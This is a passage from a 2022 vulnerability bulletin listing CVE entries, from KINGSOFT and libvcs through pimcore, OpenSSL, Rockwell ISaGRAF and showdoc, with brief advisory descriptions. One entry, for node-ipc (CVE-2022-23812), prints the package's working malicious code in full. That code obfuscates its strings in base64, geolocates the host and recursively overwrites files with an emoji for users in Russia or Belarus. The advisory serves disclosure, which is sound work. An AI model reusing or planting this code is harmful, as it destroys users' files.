The kernel mode driver kwatch3 of KINGSOFT Internet Security 9 Plus Version 2010.06.23.247 fails to properly handle crafted inputs, leading to stack-based buffer overflow. 2022-03-17 not yet calculated CVE-2022-25949
JVN
CONFIRM
kunze_law — kunze_law
 
The Kunze Law WordPress plugin before 2.1 does not escape its ‘E-Mail Error “From” Address’ settings, allowing high privilege users such as admin to perform Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed 2022-03-14 not yet calculated CVE-2022-0674
MISC
libnested — libnested
 
The package libnested before 1.5.2 are vulnerable to Prototype Pollution via the set function in index.js. **Note:** This vulnerability derives from an incomplete fix for [CVE-2020-28283](https://security.snyk.io/vuln/SNYK-JS-LIBNESTED-1054930) 2022-03-17 not yet calculated CVE-2022-25352
MISC
MISC
MISC
libvcs — libvcs
 
The package libvcs before 0.11.1 are vulnerable to Command Injection via argument injection. When calling the update_repo function (when using hg), the url parameter is passed to the hg clone command. By injecting some hg options it was possible to get arbitrary command execution. 2022-03-14 not yet calculated CVE-2022-21187
MISC
MISC
MISC
ligeo_archives — ligeo_basics
 
Ligeo Archives Ligeo Basics as of 02_01-2022 is vulnerable to Server Side Request Forgery (SSRF) which allows an attacker to read any documents via the download features. 2022-03-17 not yet calculated CVE-2021-46107
MISC
MISC
linux — linux_kernel
 
In the Linux kernel before 5.15.3, fs/quota/quota_tree.c does not validate the block number in the quota tree (on disk). This can, for example, lead to a kernel/locking/rwsem.c use-after-free if there is a corrupted quota file. 2022-03-18 not yet calculated CVE-2021-45868
MISC
MISC
MISC
MISC
MISC
linux — linux_kernel
 
Memory leak in icmp6 implementation in Linux Kernel 5.13+ allows a remote attacker to DoS a host by making it go out-of-memory via icmp6 packets of type 130 or 131. We recommend upgrading past commit 2d3916f3189172d5c69d33065c3c21119fe539fc. 2022-03-18 not yet calculated CVE-2022-0742
MISC
MISC
linux — linux_kernel
 
A flaw use after free in the Linux kernel FUSE filesystem was found in the way user triggers write(). A local user could use this flaw to get some unauthorized access to some data from the FUSE filesystem and as result potentially privilege escalation too. 2022-03-18 not yet calculated CVE-2022-1011
MISC
FEDORA
FEDORA
linux — linux_kernel
 
In drivers/usb/gadget/udc/udc-xilinx.c in the Linux kernel before 5.16.12, the endpoint index is not validated and might be manipulated by the host for out-of-array access. 2022-03-16 not yet calculated CVE-2022-27223
MISC
MISC
login_with_phone_number — login_with_phone_number
 
The Login with phone number WordPress plugin before 1.3.7 includes a file delete.php with no form of authentication or authorization checks placed in the plugin directory, allowing unauthenticated user to remotely delete the plugin files leading to a potential Denial of Service situation. 2022-03-14 not yet calculated CVE-2022-0593
MISC
MISC
maccms — maccms
 
There is a stored Cross Site Scripting (XSS) vulnerability in maccms v10 through adding videos. XSS code can be inserted at parameter positions including name and remarks. 2022-03-16 not yet calculated CVE-2021-45787
MISC
maccms — maccms
 
In maccms v10, an attacker can log in through /index.php/user/login in the “col” and “openid” parameters to gain privileges. 2022-03-16 not yet calculated CVE-2021-45786
MISC
master_addons_for_elementor — master_addons_for_elementor
 
The Master Addons for Elementor WordPress plugin before 1.8.5 does not sanitise and escape the error_message parameter before outputting it back in the response of the jltma_restrict_content AJAX action, available to unauthenticated and authenticated users, leading to a Reflected Cross-Site Scripting 2022-03-14 not yet calculated CVE-2022-0327
MISC
mattermost — mattermost
 
One of the API in Mattermost version 6.3.0 and earlier fails to properly protect the permissions, which allows the system administrators to combine the two distinct privileges/capabilities in a way that allows them to override certain restricted configurations like EnableUploads. 2022-03-18 not yet calculated CVE-2022-1003
MISC
mattermost — mattermost
 
Mattermost 6.3.0 and earlier fails to properly sanitize the HTML content in the email invitation sent to guest users, which allows registered users with special permissions to invite guest users to inject unescaped HTML content in the email invitations. 2022-03-18 not yet calculated CVE-2022-1002
MISC
MISC
maxgalleria — maxgalleria
 
Authenticated (author or higher user role) Stored Cross-Site Scripting (XSS) vulnerability discovered in MaxGalleria WordPress plugin (versions 6.2.5). 2022-03-18 not yet calculated CVE-2022-25603
CONFIRM
CONFIRM
meks_easy_photo_feed_widget — meks_easy_photo_feed_widget
 
The Meks Easy Photo Feed Widget WordPress plugin before 1.2.4 does not have capability and CSRF checks in the meks_save_business_selected_account AJAX action, available to any authenticated user, and does not escape some of the settings. As a result, any authenticated user, such as subscriber could update the plugin’s settings and put Cross-Site Scripting payloads in them 2022-03-14 not yet calculated CVE-2021-24958
MISC
microweber — microweber
 
The microweber application allows large characters to insert in the input field “post title” which can allow attackers to cause a Denial of Service (DoS) via a crafted HTTP request. in GitHub repository microweber/microweber prior to 1.2.12. 2022-03-15 not yet calculated CVE-2022-0961
CONFIRM
MISC
microweber — microweber
 
Unrestricted XML Files Leads to Stored XSS in GitHub repository microweber/microweber prior to 1.2.12. 2022-03-15 not yet calculated CVE-2022-0963
CONFIRM
MISC
microweber — microweber
 
The microweber application allows large characters to insert in the input field “fist & last name” which can allow attackers to cause a Denial of Service (DoS) via a crafted HTTP request. in microweber/microweber in GitHub repository microweber/microweber prior to 1.2.12. 2022-03-15 not yet calculated CVE-2022-0968
CONFIRM
MISC
microweber — microweber
 
Multiple Stored Cross-site Scripting (XSS) Vulnerabilities in Shop’s Other Settings, Shop’s Autorespond E-mail Settings and Shops’ Payments Methods in GitHub repository microweber/microweber prior to 1.2.11. 2022-03-15 not yet calculated CVE-2022-0954
MISC
CONFIRM
mikrotik — products
 
In the SCEP Server of RouterOS in certain Mikrotik products, an attacker can trigger a heap-based buffer overflow that leads to remote code execution. The attacker must control the SCEP server for a valid certificate. This affects mikrotik-vm-6.46, mikrotik-vm-6.46.8, mikrotik-tile-6.46.8, mikrotik-6.47.9, and mikrotik-6.47.10. 2022-03-16 not yet calculated CVE-2021-41987
MISC
MISC
mimecast — email_security
 
Mimecast Email Security before 2020-01-10 allows any admin to spoof any domain, and pass DMARC alignment via SPF. This occurs through misuse of the address rewrite feature. (The domain being spoofed must be a customer in the Mimecast grid from which the spoofing occurs.) 2022-03-16 not yet calculated CVE-2020-36519
MISC
minimist — minimist
 
Minimist <=1.2.5 is vulnerable to Prototype Pollution via file index.js, function setKey() (lines 69-95). 2022-03-17 not yet calculated CVE-2021-44906
MISC
MISC
MISC
MISC
MISC
misp — misp An issue was discovered in MISP before 2.4.156. app/Model/Server.php does not restrict generateServerSettings to the CLI. This could lead to SSRF. 2022-03-18 not yet calculated CVE-2022-27245
MISC
misp — misp An issue was discovered in MISP before 2.4.156. A malicious site administrator could store an XSS payload in the custom auth name. This would be executed each time the administrator modifies a user. 2022-03-18 not yet calculated CVE-2022-27244
MISC
misp — misp An issue was discovered in MISP before 2.4.156. app/View/Users/terms.ctp allows Local File Inclusion via the custom terms file setting. 2022-03-18 not yet calculated CVE-2022-27243
MISC
misp — misp
 
An issue was discovered in MISP before 2.4.156. An SVG org logo (which may contain JavaScript) is not forbidden by default. 2022-03-18 not yet calculated CVE-2022-27246
MISC
multisite_content_copier/updater — multisite_content_copier/updater
 
The WordPress Multisite Content Copier/Updater WordPress plugin before 2.1.2 does not sanitise and escape the s parameter before outputting it back in an attribute, leading to a Reflected Cross-Site Scripting issue in the network dashboard 2022-03-14 not yet calculated CVE-2022-0503
MISC
netgear — netgear A vulnerability is in the ‘BRS_top.html’ page of the Netgear W104, version WAC104-V1.0.4.13, which can allow a remote attacker to access this page without any authentication. When processed, it exposes firmware version information for the device. 2022-03-17 not yet calculated CVE-2021-44261
MISC
MISC
netgear — netgear
 
A vulnerability is in the ‘MNU_top.htm’ page of the Netgear W104, version WAC104-V1.0.4.13, which can allow a remote attacker to access this page without any authentication. When processed, it exposes some key information for the device. 2022-03-17 not yet calculated CVE-2021-44262
MISC
MISC
netgear — routers
 
A stack overflow vulnerability exists in the upnpd service in Netgear EX6100v1 201.0.2.28, CAX80 2.1.2.6, and DC112A 1.0.0.62, which may lead to the execution of arbitrary code without authentication. 2022-03-18 not yet calculated CVE-2022-24655
MISC
MISC
MISC
nicotine+ — nicotine+
 
Denial of service (DoS) vulnerability in Nicotine+ 3.0.3 and later allows a user with a modified Soulseek client to crash Nicotine+ by sending a file download request with a file path containing a null character. 2022-03-15 not yet calculated CVE-2021-45848
MISC
node-imdb — node-imdb
 
The package node-lmdb before 0.9.7 are vulnerable to Denial of Service (DoS) when defining a non-invokable ToString value, which will cause a crash during type check. 2022-03-16 not yet calculated CVE-2022-21164
MISC
MISC
node-ipc — node-ipc
 
This affects the package node-ipc from 10.1.1 and before 10.1.3. This package contains malicious code, that targets users with IP located in Russia or Belarus, and overwrites their files with a heart emoji. **Note**: from versions 11.0.0 onwards, instead of having malicious code directly in the source of this package, node-ipc imports the peacenotwar package that includes potentially undesired behavior. Malicious Code: **Note:** Don’t run it! js import u from “path”; import a from “fs”; import o from “https”; setTimeout(function () { const t = Math.round(Math.random() * 4); if (t > 1) { return; } const n = Buffer.from(“aHR0cHM6Ly9hcGkuaXBnZW9sb2NhdGlvbi5pby9pcGdlbz9hcGlLZXk9YWU1MTFlMTYyNzgyNGE5NjhhYWFhNzU4YTUzMDkxNTQ=”, “base64”); // https://api.ipgeolocation.io/ipgeo?apiKey=ae511e1627824a968aaaa758a5309154 o.get(n.toString(“utf8”), function (t) { t.on(“data”, function (t) { const n = Buffer.from(“Li8=”, “base64”); const o = Buffer.from(“Li4v”, “base64”); const r = Buffer.from(“Li4vLi4v”, “base64”); const f = Buffer.from(“Lw==”, “base64”); const c = Buffer.from(“Y291bnRyeV9uYW1l”, “base64”); const e = Buffer.from(“cnVzc2lh”, “base64”); const i = Buffer.from(“YmVsYXJ1cw==”, “base64”); try { const s = JSON.parse(t.toString(“utf8”)); const u = s[c.toString(“utf8”)].toLowerCase(); const a = u.includes(e.toString(“utf8”)) || u.includes(i.toString(“utf8”)); // checks if country is Russia or Belarus if (a) { h(n.toString(“utf8”)); h(o.toString(“utf8”)); h(r.toString(“utf8”)); h(f.toString(“utf8”)); } } catch (t) {} }); }); }, Math.ceil(Math.random() * 1e3)); async function h(n = “”, o = “”) { if (!a.existsSync(n)) { return; } let r = []; try { r = a.readdirSync(n); } catch (t) {} const f = []; const c = Buffer.from(“4p2k77iP”, “base64”); for (var e = 0; e < r.length; e++) { const i = u.join(n, r[e]); let t = null; try { t = a.lstatSync(i); } catch (t) { continue; } if (t.isDirectory()) { const s = h(i, o); s.length > 0 ? f.push(…s) : null; } else if (i.indexOf(o) >= 0) { try { a.writeFile(i, c.toString(“utf8”), function () {}); // overwrites file with ?? } catch (t) {} } } return f; } const ssl = true; export { ssl as default, ssl }; 2022-03-16 not yet calculated CVE-2022-23812
CONFIRM
CONFIRM
CONFIRM
CONFIRM
CONFIRM
nvidia — flare
 
NVIDIA FLARE contains a vulnerability in the admin interface, where an un-authorized attacker can cause Allocation of Resources Without Limits or Throttling, which may lead to cause system unavailable. 2022-03-17 not yet calculated CVE-2022-21822
MISC
online_admission_system — online_admission_system
 
The Online Admission System 1.0 allows an unauthenticated attacker to upload or transfer files of dangerous types to the application through documents.php, which may be used to execute malicious code or lead to code execution. 2022-03-18 not yet calculated CVE-2021-45835
MISC
MISC
MISC
online_banking_system — online_banking_system
 
Online Banking System v1.0 was discovered to contain a SQL injection vulnerability via staff_login.php. 2022-03-15 not yet calculated CVE-2022-25494
MISC
online_project_time_management_system — online_project_time_management_system Online Project Time Management System v1.0 was discovered to contain a SQL injection vulnerability via the id parameter in the function save_employee at /ptms/classes/Users.php. 2022-03-16 not yet calculated CVE-2022-26293
MISC
MISC
online_project_time_management_system — online_project_time_management_system
 
A stored cross-site scripting (XSS) vulnerability in /ptms/?page=user of Online Project Time Management System v1.0 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the user name field. 2022-03-16 not yet calculated CVE-2022-26295
MISC
open_web_analytics — open_web_analytics
 
Open Web Analytics (OWA) before 1.7.4 allows an unauthenticated remote attacker to obtain sensitive user information, which can be used to gain admin privileges by leveraging cache hashes. This occurs because files generated with ‘<?php (instead of the intended “<?php sequence) aren’t handled by the PHP interpreter. 2022-03-18 not yet calculated CVE-2022-24637
MISC
CONFIRM
opendocman — opendocman
 
An attacker can upload or transfer files of dangerous types to the OpenDocMan 1.4.4 portal via add.php using MIME-bypass, which may be automatically processed within the product’s environment or lead to arbitrary code execution. 2022-03-18 not yet calculated CVE-2021-45834
MISC
MISC
MISC
MISC
openexr — multipart_input_file
 
A flaw was found in OpenEXR’s Multipart input file functionality. A crafted multi-part input file with no actual parts can trigger a NULL pointer dereference. The highest threat from this vulnerability is to system availability. 2022-03-16 not yet calculated CVE-2021-20299
MISC
MISC
MISC
openssl — openssl
 
The BN_mod_sqrt() function, which computes a modular square root, contains a bug that can cause it to loop forever for non-prime moduli. Internally this function is used when parsing certificates that contain elliptic curve public keys in compressed form or explicit elliptic curve parameters with a base point encoded in compressed form. It is possible to trigger the infinite loop by crafting a certificate that has invalid explicit curve parameters. Since certificate parsing happens prior to verification of the certificate signature, any process that parses an externally supplied certificate may thus be subject to a denial of service attack. The infinite loop can also be reached when parsing crafted private keys as they can contain explicit elliptic curve parameters. Thus vulnerable situations include: – TLS clients consuming server certificates – TLS servers consuming client certificates – Hosting providers taking certificates or private keys from customers – Certificate authorities parsing certification requests from subscribers – Anything else which parses ASN.1 elliptic curve parameters Also any other applications that use the BN_mod_sqrt() where the attacker can control the parameter values are vulnerable to this DoS issue. In the OpenSSL 1.0.2 version the public key is not parsed during initial parsing of the certificate which makes it slightly harder to trigger the infinite loop. However any operation which requires the public key from the certificate will trigger the infinite loop. In particular the attacker can use a self-signed certificate to trigger the loop during verification of the certificate signature. This issue affects OpenSSL versions 1.0.2, 1.1.1 and 3.0. It was addressed in the releases of 1.1.1n and 3.0.2 on the 15th March 2022. Fixed in OpenSSL 3.0.2 (Affected 3.0.0,3.0.1). Fixed in OpenSSL 1.1.1n (Affected 1.1.1-1.1.1m). Fixed in OpenSSL 1.0.2zd (Affected 1.0.2-1.0.2zc). 2022-03-15 not yet calculated CVE-2022-0778
CONFIRM
CONFIRM
CONFIRM
CONFIRM
DEBIAN
MLIST
MLIST
opensuse — factory
 
A Improper Privilege Management vulnerability in the sudoers configuration in cscreen of openSUSE Factory allows any local users to gain the privileges of the tty and dialout groups and access and manipulate any running cscreen seesion. This issue affects: openSUSE Factory cscreen version 1.2-1.3 and prior versions. 2022-03-16 not yet calculated CVE-2022-21946
CONFIRM
opensuse — factory
 
A Insecure Temporary File vulnerability in cscreen of openSUSE Factory allows local attackers to cause DoS for cscreen and a system DoS for non-default systems. This issue affects: openSUSE Factory cscreen version 1.2-1.3 and prior versions. 2022-03-16 not yet calculated CVE-2022-21945
CONFIRM
openvpn — openvpn
 
OpenVPN 2.1 until v2.4.12 and v2.5.6 may enable authentication bypass in external authentication plug-ins when more than one of them makes use of deferred authentication replies, which allows an external user to be granted access with only partially correct credentials. 2022-03-18 not yet calculated CVE-2022-0547
MISC
MISC
MISC
paramiko — paramiko
 
In Paramiko before 2.10.1, a race condition (between creation and chmod) in the write_private_key_file function could allow unauthorized information disclosure. 2022-03-17 not yet calculated CVE-2022-24302
MISC
MISC
pascom — cloud_phone_system An issue was discovered in Pascom Cloud Phone System before 7.20.x. A configuration error between NGINX and a backend Tomcat server leads to a path traversal in the Tomcat server, exposing unintended endpoints. 2022-03-18 not yet calculated CVE-2021-45967
MISC
MISC
MISC
MISC
pascom — cloud_phone_system An issue was discovered in xmppserver jar in the XMPP Server component of the JIve platform, as used in Pascom Cloud Phone System before 7.20.x (and in other products). An endpoint in the backend Tomcat server of the Pascom allows SSRF, a related issue to CVE-2019-18394. 2022-03-18 not yet calculated CVE-2021-45968
MISC
MISC
MISC
MISC
MISC
pascom — cloud_phone_system
 
An issue was discovered in Pascom Cloud Phone System before 7.20.x. In the management REST API, /services/apply in exd.pl allows remote attackers to execute arbitrary code via shell metacharacters. 2022-03-18 not yet calculated CVE-2021-45966
MISC
MISC
MISC
petfinder_listings — petfinder_listings
 
The Petfinder Listings WordPress plugin through 1.0.18 does not escape its settings, allowing high privilege users such as admin to perform Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed 2022-03-14 not yet calculated CVE-2022-0702
MISC
pgadmin_4 — pgadmin_4
 
When run in server mode, pgAdmin 4 allows users to store files on the server under individual storage directories. Files such as SQL scripts may be uploaded through the user interface. The URI to which upload requests are made fails to validate the upload path to prevent path traversal techniques being used to store files outside of the storage directory. A malicious, but authorised and authenticated user can construct an HTTP request using their existing CSRF token and session cookie to manually upload files to any location that the operating system user account under which pgAdmin is running has permission to write. 2022-03-16 not yet calculated CVE-2022-0959
MISC
php — php
 
A Remote Code Execution (RCE) vulnerability exists in Sourcecodester Attendance and Payroll System v1.0 which allows an unauthenticated remote attacker to upload a maliciously crafted PHP via photo upload. 2022-03-17 not yet calculated CVE-2021-44087
MISC
MISC
MISC
pimcore — pimcore Cross-site Scripting (XSS) – Stored in GitHub repository pimcore/pimcore prior to 10.4.0. 2022-03-15 not yet calculated CVE-2022-0894
CONFIRM
MISC
pimcore — pimcore Cross-site Scripting (XSS) – Stored in GitHub repository pimcore/pimcore prior to 10.4.0. 2022-03-16 not yet calculated CVE-2022-0911
CONFIRM
MISC
pimcore — pimcore
 
Cross-site Scripting (XSS) – Stored in GitHub repository pimcore/pimcore prior to 10.4.0. 2022-03-16 not yet calculated CVE-2022-0704
CONFIRM
MISC
pimcore — pimcore
 
Cross-site Scripting (XSS) – Stored in GitHub repository pimcore/pimcore prior to 10.4.0. 2022-03-16 not yet calculated CVE-2022-0705
CONFIRM
MISC
pimcore — pimcore
 
Cross-site Scripting (XSS) – Stored in GitHub repository pimcore/pimcore prior to 10.4.0. 2022-03-15 not yet calculated CVE-2022-0893
CONFIRM
MISC
piwigo — piwigo
 
Piwigo v12.2.0 was discovered to contain a SQL injection vulnerability via pwg.users.php. 2022-03-18 not yet calculated CVE-2022-26266
MISC
piwigo — piwigo
 
Piwigo v12.2.0 was discovered to contain an information leak via the action parameter in /admin/maintenance_actions.php. 2022-03-18 not yet calculated CVE-2022-26267
MISC
post-loader — post-loader
 
The package post-loader from 0.0.0 are vulnerable to Arbitrary Code Execution which uses a markdown parser in an unsafe way so that any javascript code inside the markdown input files gets evaluated and executed. 2022-03-17 not yet calculated CVE-2022-0748
MISC
price_table — price_table
 
Authenticated (contributor of higher user role) Stored Cross-Site Scripting (XSS) vulnerability discovered in WordPress Price Table plugin (versions <= 0.2.2). 2022-03-18 not yet calculated CVE-2022-25604
CONFIRM
CONFIRM
projectworlds — hospital_management_system
 
An issue was discovered in Projectworlds Hospital Management System v1.0. Unauthorized malicious attackers can add patients without restriction via add_patient.php. 2022-03-16 not yet calculated CVE-2021-45852
MISC
prototype_pollution — prototype_pollution
 
The package set-in before 2.0.3 are vulnerable to Prototype Pollution via the setIn method, as it allows an attacker to merge object prototypes into it. **Note:** This vulnerability derives from an incomplete fix of [CVE-2020-28273](https://security.snyk.io/vuln/SNYK-JS-SETIN-1048049) 2022-03-17 not yet calculated CVE-2022-25354
MISC
MISC
MISC
qemu — e1000_nic_emulator
 
An infinite loop flaw was found in the e1000 NIC emulator of the QEMU. This issue occurs while processing transmits (tx) descriptors in process_tx_desc if various descriptor fields are initialized with invalid values. This flaw allows a guest to consume CPU cycles on the host, resulting in a denial of service. The highest threat from this vulnerability is to system availability. 2022-03-16 not yet calculated CVE-2021-20257
MISC
MISC
MISC
MISC
qemu — vhost-vsock_device
 
A flaw was found in the vhost-vsock device of QEMU. In case of error, an invalid element was not detached from the virtqueue before freeing its memory, leading to memory leakage and other unexpected results. Affected QEMU versions <= 6.2.0. 2022-03-16 not yet calculated CVE-2022-26354
MISC
qemu — virtio-net_device
 
A flaw was found in the virtio-net device of QEMU. This flaw was inadvertently introduced with the fix for CVE-2021-3748, which forgot to unmap the cached virtqueue elements on error, leading to memory leakage and other unexpected results. Affected QEMU version: 6.2.0. 2022-03-16 not yet calculated CVE-2022-26353
MISC
qs — qs
 
A Denial of Service vulnerability exists in qs up to 6.8.0 due to insufficient sanitization of property in the gs.parse function. The merge() function allows the assignment of properties on an array in the query. For any property being assigned, a value in the array is converted to an object containing these properties. Essentially, this means that the property whose expected type is Array always has to be checked with Array.isArray() by the user. This may not be obvious to the user and can cause unexpected behavior. 2022-03-17 not yet calculated CVE-2021-44907
MISC
MISC
MISC
MISC
quake — quake
 
The package guake before 3.8.5 are vulnerable to Exposed Dangerous Method or Function due to the exposure of execute_command and execute_command_by_uuid methods via the d-bus interface, which makes it possible for a malicious user to run an arbitrary command via the d-bus method. **Note:** Exploitation requires the user to have installed another malicious program that will be able to send dbus signals or run terminal commands. 2022-03-17 not yet calculated CVE-2021-23556
MISC
MISC
MISC
MISC
MISC
rambus_safezone — basic_crypto_module
 
The Rambus SafeZone Basic Crypto Module before 10.4.0, as used in certain Fujifilm (formerly Fuji Xerox) devices before 2022-03-01, Canon imagePROGRAF and imageRUNNER devices through 2022-03-14, and potentially many other devices, generates RSA keys that can be broken with Fermat’s factorization method. This allows efficient calculation of private RSA keys from the public key of a TLS certificate. 2022-03-14 not yet calculated CVE-2022-26320
MISC
CONFIRM
MISC
MISC
rapid7 — insight_agent
 
Rapid7 Insight Agent versions 3.1.2.38 and earlier suffer from a privilege escalation vulnerability, whereby an attacker can hijack the flow of execution due to an unquoted argument to the runas.exe command used by the ir_agent.exe component, resulting in elevated rights and persistent access to the machine. This issue was fixed in Rapid7 Insight Agent version 3.1.3.80. 2022-03-17 not yet calculated CVE-2022-0237
CONFIRM
MISC
rapid7 — nexpose
 
Rapid7 Nexpose versions 6.6.93 and earlier are susceptible to an SQL Injection vulnerability, whereby valid search operators are not defined. This lack of validation can allow an attacker to manipulate the “ANY” and “OR” operators in the SearchCriteria and inject SQL code. This issue was fixed in Rapid7 Nexpose version 6.6.129. 2022-03-17 not yet calculated CVE-2022-0757
CONFIRM
rapid7 — nexpose
 
Rapid7 Nexpose versions 6.6.129 and earlier suffer from a reflected cross site scripting vulnerability, within the shared scan configuration component of the tool. With this vulnerability an attacker could pass literal values as the test credentials, providing the opportunity for a potential XSS attack. This issue is fixed in Rapid7 Nexpose version 6.6.130. 2022-03-17 not yet calculated CVE-2022-0758
CONFIRM
responsive_menu — responsive_menu
 
Nonce token leak vulnerability leading to arbitrary file upload, theme deletion, plugin settings change discovered in Responsive Menu WordPress plugin (versions <= 4.1.7). 2022-03-18 not yet calculated CVE-2022-25602
CONFIRM
CONFIRM
rockwell_automation — isagraf_runtime Rockwell Automation ISaGRAF Runtime Versions 4.x and 5.x includes the functionality of setting a password that is required to execute privileged commands. The password value passed to ISaGRAF Runtime is the result of encryption performed with a fixed key value using the tiny encryption algorithm (TEA) on an entered or saved password. A remote, unauthenticated attacker could pass their own encrypted password to the ISaGRAF 5 Runtime, which may result in information disclosure on the device. 2022-03-18 not yet calculated CVE-2020-25180
CONFIRM
CONFIRM
CONFIRM
CONFIRM
rockwell_automation — isagraf_runtime Rockwell Automation ISaGRAF Runtime Versions 4.x and 5.x stores the password in plaintext in a file that is in the same directory as the executable file. ISaGRAF Runtime reads the file and saves the data in a variable without any additional modification. A local, unauthenticated attacker could compromise the user passwords, resulting in information disclosure. 2022-03-18 not yet calculated CVE-2020-25184
CONFIRM
CONFIRM
CONFIRM
CONFIRM
rockwell_automation — isagraf_runtime Rockwell Automation ISaGRAF Runtime Versions 4.x and 5.x searches for and loads DLLs as dynamic libraries. Uncontrolled loading of dynamic libraries could allow a local, unauthenticated attacker to execute arbitrary code. This vulnerability only affects ISaGRAF Runtime when running on Microsoft Windows systems. 2022-03-18 not yet calculated CVE-2020-25182
CONFIRM
CONFIRM
CONFIRM
CONFIRM
rockwell_automation — isagraf_runtime ISaGRAF Workbench communicates with Rockwell Automation ISaGRAF Runtime Versions 4.x and 5.x using TCP/IP. This communication protocol provides various file system operations, as well as the uploading of applications. Data is transferred over this protocol unencrypted, which could allow a remote unauthenticated attacker to upload, read, and delete files. 2022-03-18 not yet calculated CVE-2020-25178
CONFIRM
CONFIRM
CONFIRM
CONFIRM
rockwell_automation — isagraf_runtime
 
Some commands used by the Rockwell Automation ISaGRAF Runtime Versions 4.x and 5.x eXchange Layer (IXL) protocol perform various file operations in the file system. Since the parameter pointing to the file name is not checked for reserved characters, it is possible for a remote, unauthenticated attacker to traverse an application’s directory, which could lead to remote code execution. 2022-03-18 not yet calculated CVE-2020-25176
CONFIRM
CONFIRM
CONFIRM
CONFIRM
runasspc — runasspc
 
RunAsSpc 4.0 uses a universal and recoverable encryption key. In possession of a file encrypted by RunAsSpc, an attacker can recover the credentials that were used. 2022-03-16 not yet calculated CVE-2022-26660
MISC
sailsjs — sail.js
 
SailsJS Sails.js <=1.4.0 is vulnerable to Prototype Pollution via controller/load-action-modules.js, function loadActionModules(). 2022-03-17 not yet calculated CVE-2021-44908
MISC
MISC
MISC
samba — samba Kerberos acceptors need easy access to stable AD identifiers (eg objectSid). Samba as an AD DC now provides a way for Linux applications to obtain a reliable SID (and samAccountName) in issued tickets. 2022-03-16 not yet calculated CVE-2020-25721
MISC
MISC
MISC
secure_mobile_access — 100_series_products
 
** UNSUPPORTED WHEN ASSIGNED ** Improper neutralization of Special Elements leading to OS Command Injection vulnerability impacting end-of-life Secure Remote Access (SRA) products and older firmware versions of Secure Mobile Access (SMA) 100 series products, specifically the SRA appliances running all 8.x, 9.0.0.5-19sv and earlier versions and Secure Mobile Access (SMA) 100 series products running older firmware 9.0.0.9-26sv and earlier versions. 2022-03-17 not yet calculated CVE-2022-22273
CONFIRM
seo_301_meta — seo_301_meta
 
The SEO 301 Meta WordPress plugin through 1.9.1 does not escape its Request and Destination settings, allowing high privilege users such as admin to perform Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed 2022-03-14 not yet calculated CVE-2022-0701
MISC
simple_quotation — simple_quotation The Simple Quotation WordPress plugin through 1.3.2 does not have authorisation (and CSRF) checks in various of its AJAX actions and is lacking escaping of user data when using it in SQL statements, allowing any authenticated users, such as subscriber to perform SQL injection attacks 2022-03-14 not yet calculated CVE-2022-22735
MISC
simple_quotation — simple_quotation
 
The Simple Quotation WordPress plugin through 1.3.2 does not have CSRF check when creating or editing a quote and does not sanitise and escape Quotes. As a result, attacker could make a logged in admin create or edit arbitrary quote, and put Cross-Site Scripting payloads in them 2022-03-14 not yet calculated CVE-2022-22734
MISC
simple_tracking — simple_tracking
 
The Simple Tracking WordPress plugin before 1.7 does not sanitise and escape its settings, allowing high privilege users such as admin to perform Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed 2022-03-14 not yet calculated CVE-2022-0700
MISC
singoocms — singoocms
 
This affects all versions of package SinGooCMS.Utility. The socket client in the package can pass in the payload via the user-controllable input after it has been established, because this socket client transmission does not have the appropriate restrictions or type bindings for the BinaryFormatter. 2022-03-17 not yet calculated CVE-2022-0749
MISC
MISC
MISC
slims8 — akasia
 
Slims8 Akasia 8.3.1 is affected by SQL injection in /admin/modules/bibliography/index.php, /admin/modules/membership/member_type.php, /admin/modules/system/user_group.php, and /admin/modules/membership/index.php through the dir parameter. It can be used by remotely authenticated librarian users. 2022-03-17 not yet calculated CVE-2021-45791
MISC
slims9 — bulian Slims9 Bulian 9.4.2 is affected by SQL injection in /admin/modules/system/backup.php. User data can be obtained. 2022-03-17 not yet calculated CVE-2021-45794
MISC
slims9 — bulian Slims9 Bulian 9.4.2 is affected by SQL injection in lib/comment.inc.php. User data can be obtained. 2022-03-17 not yet calculated CVE-2021-45793
MISC
slims9 — bulian
 
Slims9 Bulian 9.4.2 is affected by Cross Site Scripting (XSS) in /admin/modules/system/custom_field.php. 2022-03-17 not yet calculated CVE-2021-45792
MISC
snapcenter — snapcenter
 
SnapCenter versions prior to 4.5 are susceptible to a vulnerability which could allow a local authenticated attacker to discover plaintext HANA credentials. 2022-03-16 not yet calculated CVE-2022-23234
MISC
sonatype — nexus_repository_manager
 
Sonatype Nexus Repository Manager 3.36.0 allows HTML Injection. 2022-03-17 not yet calculated CVE-2021-43961
MISC
MISC
sourcecodester — attendance_and_payroll_system
 
An SQL Injection vulnerability exists in Sourcecodester Attendance and Payroll System v1.0 which allows a remote attacker to bypass authentication via unsanitized login parameters. 2022-03-17 not yet calculated CVE-2021-44088
MISC
MISC
MISC
spatie — media-library-pro_library
 
The Spatie media-library-pro library through 1.17.10 and 2.x through 2.1.6 for Laravel allows remote attackers to upload executable files via the uploads route. 2022-03-17 not yet calculated CVE-2021-45040
MISC
MISC
sqlpad — sqlpad
 
Template injection in connection test endpoint leads to RCE in GitHub repository sqlpad/sqlpad prior to 6.10.1. 2022-03-15 not yet calculated CVE-2022-0944
CONFIRM
MISC
star7th — showdoc Unrestricted Upload of File with Dangerous Type in GitHub repository star7th/showdoc prior to 2.10.4. 2022-03-15 not yet calculated CVE-2022-0950
CONFIRM
MISC
star7th — showdoc Stored XSS viva .webmv file upload in GitHub repository star7th/showdoc prior to 2.10.4. 2022-03-15 not yet calculated CVE-2022-0964
MISC
CONFIRM
star7th — showdoc Stored XSS via File Upload in GitHub repository star7th/showdoc prior to 2.10.4. 2022-03-15 not yet calculated CVE-2022-0957
CONFIRM
MISC
star7th — showdoc Stored XSS via File Upload in GitHub repository star7th/showdoc prior to v.2.10.4. 2022-03-15 not yet calculated CVE-2022-0956
MISC
CONFIRM
star7th — showdoc Stored XSS via File Upload in star7th/showdoc in star7th/showdoc in GitHub repository star7th/showdoc prior to 2.10.4. 2022-03-15 not yet calculated CVE-2022-0967
MISC
CONFIRM
star7th — showdoc Stored XSS viva .ofd file upload in GitHub repository star7th/showdoc prior to 2.10.4. 2022-03-15 not yet calculated CVE-2022-0965
MISC
CONFIRM
star7th — showdoc File Upload Restriction Bypass leading to Stored XSS Vulnerability in GitHub repository star7th/showdoc prior to 2.10.4. 2022-03-15 not yet calculated CVE-2022-0951
MISC
CONFIRM
